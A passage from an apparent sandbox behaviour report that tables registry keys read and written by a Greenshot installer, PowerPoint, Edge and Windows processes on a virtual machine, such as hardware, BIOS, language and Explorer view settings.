| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\DllHost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\DllHost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Greenshot-INSTALLER-1.2.10.6-RELEASE.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\Greenshot\Plugins\GreenshotOCRPlugin\greenshotocrcommand.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\PING.EXE | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\Clipup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\system32\Clipup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Windows\System32\clipup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\System32\clipup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\Clipup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\Clipup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\Clipup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\Clipup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\System32\clipup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\System32\clipup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\System32\clipup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\System32\clipup.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Control Panel\Desktop | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Control Panel\Desktop\Pattern Upgrade = "TRUE" | C:\Windows\system32\rundll32.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Program Files\Greenshot\Greenshot.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202020202020202 | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\System32\PickerHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1024x768x96(1).y = "4294935296" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\3 = 78003100000000004759005f1100557365727300640009000400efbec5522d606d59e73a2e0000006c0500000000010000000000000000003a00000000002dcc690055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 | C:\Program Files\Greenshot\Greenshot.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 03000000010000000200000000000000ffffffff | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1092616193" | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\System32\PickerHost.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Greenshot\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Program Files\Greenshot\Greenshot.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Mode = "1" | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" | C:\Windows\System32\PickerHost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Windows\System32\PickerHost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 020000000000000001000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1024x768x96(1).x = "4294935296" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 010000000200000000000000ffffffff | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\IconSize = "96" | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\System32\PickerHost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupView = "0" | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Windows\System32\PickerHost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239} | C:\Windows\System32\PickerHost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\NodeSlot = "3" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Greenshot\Greenshot.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Mode = "1" | C:\Windows\System32\PickerHost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\System32\PickerHost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Windows\System32\PickerHost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2 = 56003100000000004759e862100057696e646f777300400009000400efbec5522d606d59e73a2e000000a6050000000001000000000000000000000000000000407b1000570069006e0064006f0077007300000016000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Program Files\Greenshot\Greenshot.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupView = "0" | C:\Windows\System32\PickerHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell | C:\Windows\System32\PickerHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings | C:\Windows\system32\control.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:PID = "0" | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\explorer.exe | N/A |
